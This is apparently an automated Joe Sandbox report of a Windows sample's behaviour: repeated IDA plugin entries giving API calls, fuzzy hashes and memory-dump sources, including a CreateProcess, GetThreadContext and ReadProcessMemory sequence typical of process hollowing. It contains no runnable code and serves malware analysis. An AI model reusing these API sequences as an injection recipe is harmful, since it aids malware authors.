                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: __fread_nolock_memmove
                                • String ID: EA06
                                • API String ID: 1988441806-3962188686
                                • Opcode ID: 573e19caa0931ab4420a10afb7a95aacbcd04a8b849a59b891615316c2d0bef1
                                • Instruction ID: 778685d44043bc47871342a41496733034f62543c0681a3ad65be711e2e04dd4
                                • Opcode Fuzzy Hash: 573e19caa0931ab4420a10afb7a95aacbcd04a8b849a59b891615316c2d0bef1
                                • Instruction Fuzzy Hash: 4901B972D042586EDB28C6A8C856FEE7BF8DB15301F00419EF552D2181E575E60897A0
                                APIs
                                • GetTempPathW.KERNEL32(00000104,?), ref: 00B09B82
                                • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00B09B99
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Temp$FileNamePath
                                • String ID: aut
                                • API String ID: 3285503233-3010740371
                                • Opcode ID: d500f369ade13ce21cad766b6497d012cf58a9471b070084b49ff6e6944372a4
                                • Instruction ID: 783e337058d75015a1d2539c4634f9b16073b6a67a4ff26457dcdf80c305f5ce
                                • Opcode Fuzzy Hash: d500f369ade13ce21cad766b6497d012cf58a9471b070084b49ff6e6944372a4
                                • Instruction Fuzzy Hash: 4AD05E7994030EABDB209B90DC0EFAA777CE704701F0042F1BF54921A1DEB055998BA1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c56ac3233b2c8cccab1be6590bde15718a7c06a511c20f88f0ef9473739e1d79
                                • Instruction ID: 190d654f4048254c0833b0664e934eaff83b63d3ccbeb62d79acd62c985c8f20
                                • Opcode Fuzzy Hash: c56ac3233b2c8cccab1be6590bde15718a7c06a511c20f88f0ef9473739e1d79
                                • Instruction Fuzzy Hash: A0F16970A083019FC714DF28C584A6ABBE5FF89314F54896EF8999B391D731E946CF82
                                APIs
                                  • Part of subcall function 00AC03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AC03D3
                                  • Part of subcall function 00AC03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00AC03DB
                                  • Part of subcall function 00AC03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AC03E6
                                  • Part of subcall function 00AC03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AC03F1
                                  • Part of subcall function 00AC03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00AC03F9
                                  • Part of subcall function 00AC03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00AC0401
                                  • Part of subcall function 00AB6259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00AAFA90), ref: 00AB62B4
                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00AAFB2D
                                • OleInitialize.OLE32(00000000), ref: 00AAFBAA
                                • CloseHandle.KERNEL32(00000000), ref: 00AE49F2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                • String ID:
                                • API String ID: 1986988660-0
                                • Opcode ID: ca1b1abbcea39cdcc6cd647e3dc02f07d74c574e5b5b099ac42b0374738538bb
                                • Instruction ID: 325ba9f87a45977ee134cc81ccc6df28f7cd71448eb67ea17ee1fab4ceda0932
                                • Opcode Fuzzy Hash: ca1b1abbcea39cdcc6cd647e3dc02f07d74c574e5b5b099ac42b0374738538bb
                                • Instruction Fuzzy Hash: FB81A8B19012409EC784DF2AEE51665BBF8FB99308B10857ED419C73E2EFB98805CF94
                                APIs
                                • _memset.LIBCMT ref: 00AA4401
                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00AA44A6
                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00AA44C3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: IconNotifyShell_$_memset
                                • String ID:
                                • API String ID: 1505330794-0
                                • Opcode ID: 1ae599abc72a28eb0c5bc2d0a6dabd46d08933b441908906caf2a8f86546521d
                                • Instruction ID: ed4733fddb8d7206898fa09b2f662eea16103fcf9fc48563e0860e2a8af47a37
                                • Opcode Fuzzy Hash: 1ae599abc72a28eb0c5bc2d0a6dabd46d08933b441908906caf2a8f86546521d
                                • Instruction Fuzzy Hash: 733130715057019FD761DF24D884797BBF8FB8D704F00092EF59A83291EBB5A948CB92
                                APIs
                                • __FF_MSGBANNER.LIBCMT ref: 00AC5963
                                  • Part of subcall function 00ACA3AB: __NMSG_WRITE.LIBCMT ref: 00ACA3D2
                                  • Part of subcall function 00ACA3AB: __NMSG_WRITE.LIBCMT ref: 00ACA3DC
                                • __NMSG_WRITE.LIBCMT ref: 00AC596A
                                  • Part of subcall function 00ACA408: GetModuleFileNameW.KERNEL32(00000000,00B643BA,00000104,?,00000001,00000000), ref: 00ACA49A
                                  • Part of subcall function 00ACA408: ___crtMessageBoxW.LIBCMT ref: 00ACA548
                                  • Part of subcall function 00AC32DF: ___crtCorExitProcess.LIBCMT ref: 00AC32E5
                                  • Part of subcall function 00AC32DF: ExitProcess.KERNEL32 ref: 00AC32EE
                                  • Part of subcall function 00AC8D68: __getptd_noexit.LIBCMT ref: 00AC8D68
                                • RtlAllocateHeap.NTDLL(01110000,00000000,00000001,00000000,?,?,?,00AC1013,?), ref: 00AC598F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                • String ID:
                                • API String ID: 1372826849-0
                                • Opcode ID: ba67b5677682ef13a20672cb4ba018eac9d3a2fdb61c55aa878c57426449420d
                                • Instruction ID: de80b612d13abc4823687590219c63b9fbd7b0f04420a300f6d00f4a43874575
                                • Opcode Fuzzy Hash: ba67b5677682ef13a20672cb4ba018eac9d3a2fdb61c55aa878c57426449420d
                                • Instruction Fuzzy Hash: E601F536700B15DEEA252B74DD52F6E72A89F52B30F13046EF401AB1C1DFB4AD818760
                                APIs
                                • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00B097D2,?,?,?,?,?,00000004), ref: 00B09B45
                                • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00B097D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00B09B5B
                                • CloseHandle.KERNEL32(00000000,?,00B097D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00B09B62
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: File$CloseCreateHandleTime
                                • String ID:
                                • API String ID: 3397143404-0
                                • Opcode ID: aea1732de9cc8bb516ead71be1714934c794754761dc35969fd50037aade6de4
                                • Instruction ID: 4601423dc45467b00e5d32b3ff5dfd6f92923174da1c0f644c3f6bbc3f0dbf8a
                                • Opcode Fuzzy Hash: aea1732de9cc8bb516ead71be1714934c794754761dc35969fd50037aade6de4
                                • Instruction Fuzzy Hash: E0E08632180315BBD7311B54EC0AFDA7F68EB05771F104230FB147A0E08BB129229798
                                APIs
                                • _free.LIBCMT ref: 00B08FA5
                                  • Part of subcall function 00AC2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00AC9C64), ref: 00AC2FA9
                                  • Part of subcall function 00AC2F95: GetLastError.KERNEL32(00000000,?,00AC9C64), ref: 00AC2FBB
                                • _free.LIBCMT ref: 00B08FB6
                                • _free.LIBCMT ref: 00B08FC8
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                • Instruction ID: c64c9c17b6cdd73e9252292d507dbf26e91c9937bc0a45bd039f1a8a956f7ee0
                                • Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                • Instruction Fuzzy Hash: 60E012A16097064ACA24B578AE40F935BEE9F48360B190C5DB44ADB182DE24E9518264
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID:
                                • String ID: CALL
                                • API String ID: 0-4196123274
                                • Opcode ID: 5f966cc26482eb224d8bac411a627c2b6a639e95e43deff78a18a2bfdf725580
                                • Instruction ID: 47e0907588a86de04ee900d2a54cad9c75e6ad40fce168f2fdea7e32964006fd
                                • Opcode Fuzzy Hash: 5f966cc26482eb224d8bac411a627c2b6a639e95e43deff78a18a2bfdf725580
                                • Instruction Fuzzy Hash: C9224874608341DFC724DF14C594B6ABBF1BF96300F15896DE8868B2A2DB71ED81CB92
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID: EA06
                                • API String ID: 4104443479-3962188686
                                • Opcode ID: ad892f88611d54a23d400ce22163426288ac764dfc947a372cf3b5a94f9ca5c3
                                • Instruction ID: 43fd6bbc58cbd3bbef2f0053cd78c17a31452db358b1095bd14c1c3067cff9f0
                                • Opcode Fuzzy Hash: ad892f88611d54a23d400ce22163426288ac764dfc947a372cf3b5a94f9ca5c3
                                • Instruction Fuzzy Hash: A7415971A04554ABDF319B64C9917FE7FB6AF8B300F284065F8829B2C2C7E19D4483E1
                                APIs
                                • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00A4238A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681768702.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_a40000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID: D
                                • API String ID: 963392458-2746444292
                                • Opcode ID: c44042240367ae80eaa8206569f06584b606a7a7c9118113533914ad92b6354f
                                • Instruction ID: b04ebd144324f622cbcf4e9bf56b652f7749092b894b96997d833cf6fce77e34
                                • Opcode Fuzzy Hash: c44042240367ae80eaa8206569f06584b606a7a7c9118113533914ad92b6354f
                                • Instruction Fuzzy Hash: D101C27594030CABDB20DFE0CC59FFE777CAF84701F508559BA159A180EA78A6488B55
                                APIs
                                • CreateProcessW.KERNELBASE(?,00000000), ref: 00A41ACD
                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00A41AF1
                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00A41B13
                                • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 00A41E1C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681768702.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_a40000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Process$ContextCreateMemoryReadTerminateThreadWow64
                                • String ID:
                                • API String ID: 572931308-0
                                • Opcode ID: b327fbffe67f088a8ec06bc3364a8d9e1395271827ab643009cfd88a26bb8519
                                • Instruction ID: 370645632204ed863eebf297863f55fd3a65fff1eaee2179a400488f55990f3d
                                • Opcode Fuzzy Hash: b327fbffe67f088a8ec06bc3364a8d9e1395271827ab643009cfd88a26bb8519
                                • Instruction Fuzzy Hash: E112BD24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A
                                APIs
                                • IsThemeActive.UXTHEME ref: 00AA4992
                                  • Part of subcall function 00AC35AC: __lock.LIBCMT ref: 00AC35B2
                                  • Part of subcall function 00AC35AC: DecodePointer.KERNEL32(00000001,?,00AA49A7,00AF81BC), ref: 00AC35BE
                                  • Part of subcall function 00AC35AC: EncodePointer.KERNEL32(?,?,00AA49A7,00AF81BC), ref: 00AC35C9
                                  • Part of subcall function 00AA4A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00AA4A73
                                  • Part of subcall function 00AA4A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00AA4A88
                                  • Part of subcall function 00AA3B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AA3B7A
                                  • Part of subcall function 00AA3B4C: IsDebuggerPresent.KERNEL32 ref: 00AA3B8C
                                  • Part of subcall function 00AA3B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00B662F8,00B662E0,?,?), ref: 00AA3BFD
                                  • Part of subcall function 00AA3B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00AA3C81
                                • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00AA49D2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                • String ID:
                                • API String ID: 1438897964-0
                                • Opcode ID: 09a50bc48168b07651382d11342b4bfaff489b4f87fcecf3666a62e791268fec
                                • Instruction ID: 011836fa7d07561c3b208a15b5499f55c54c9ceb80bd0117160bb59b0c592997
                                • Opcode Fuzzy Hash: 09a50bc48168b07651382d11342b4bfaff489b4f87fcecf3666a62e791268fec
                                • Instruction Fuzzy Hash: E9116A719083119BC700EF28DD0591ABFF8EB99750F00862EF055832F1DFB49955CB96
                                APIs
                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00AA5981,?,?,?,?), ref: 00AA5E27
                                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00AA5981,?,?,?,?), ref: 00ADE19C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: CreateFile
                                • String ID:
                                • API String ID: 823142352-0
                                • Opcode ID: b3f4584d1a94934af93b021570799c07f6fa2086fd11ee0bd2105ab5ae5db83d
                                • Instruction ID: 14f7be2c55e283ec85886625b0466981d97a12b02201ba91bf727fd399ba389e
                                • Opcode Fuzzy Hash: b3f4584d1a94934af93b021570799c07f6fa2086fd11ee0bd2105ab5ae5db83d
                                • Instruction Fuzzy Hash: 04019E70644708BEF7345F24CC8AF763AACAB02778F148319BAE56B1E0C7B01E458B58
                                APIs
                                  • Part of subcall function 00AC594C: __FF_MSGBANNER.LIBCMT ref: 00AC5963
                                  • Part of subcall function 00AC594C: __NMSG_WRITE.LIBCMT ref: 00AC596A
                                  • Part of subcall function 00AC594C: RtlAllocateHeap.NTDLL(01110000,00000000,00000001,00000000,?,?,?,00AC1013,?), ref: 00AC598F
                                • std::exception::exception.LIBCMT ref: 00AC102C
                                • __CxxThrowException@8.LIBCMT ref: 00AC1041
                                  • Part of subcall function 00AC87DB: RaiseException.KERNEL32(?,?,?,00B5BAF8,00000000,?,?,?,?,00AC1046,?,00B5BAF8,?,00000001), ref: 00AC8830
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                • String ID:
                                • API String ID: 3902256705-0
                                • Opcode ID: 324fb8398426647b5e01f0921f579797886ad7a5d42d80682dd6ca157df964aa
                                • Instruction ID: 90130f95c24700d5255f5040dbadf42c25a0ee70f42990dab4111009512f1e44
                                • Opcode Fuzzy Hash: 324fb8398426647b5e01f0921f579797886ad7a5d42d80682dd6ca157df964aa
                                • Instruction Fuzzy Hash: AAF0A93550025DA6CB20AB54ED06FDF77E8AF01351F21046EFC0496552EF719A8082D0
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: __lock_file_memset
                                • String ID:
                                • API String ID: 26237723-0
                                • Opcode ID: 70385ed728717044e6c00d5679beb2a5f5ae60de3c76a913e773fae2f89f93fe
                                • Instruction ID: 2376af22503a660e649b2dee5a1a5595c1a660fb0506ecf6e7dd8b8c5301846b
                                • Opcode Fuzzy Hash: 70385ed728717044e6c00d5679beb2a5f5ae60de3c76a913e773fae2f89f93fe
                                • Instruction Fuzzy Hash: A6018871C00604EBCF12AF758D01F9E7B71BF40360F16821DF8145A161DB358A91EB91
                                APIs
                                  • Part of subcall function 00AC8D68: __getptd_noexit.LIBCMT ref: 00AC8D68
                                • __lock_file.LIBCMT ref: 00AC561B
                                  • Part of subcall function 00AC6E4E: __lock.LIBCMT ref: 00AC6E71
                                • __fclose_nolock.LIBCMT ref: 00AC5626
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
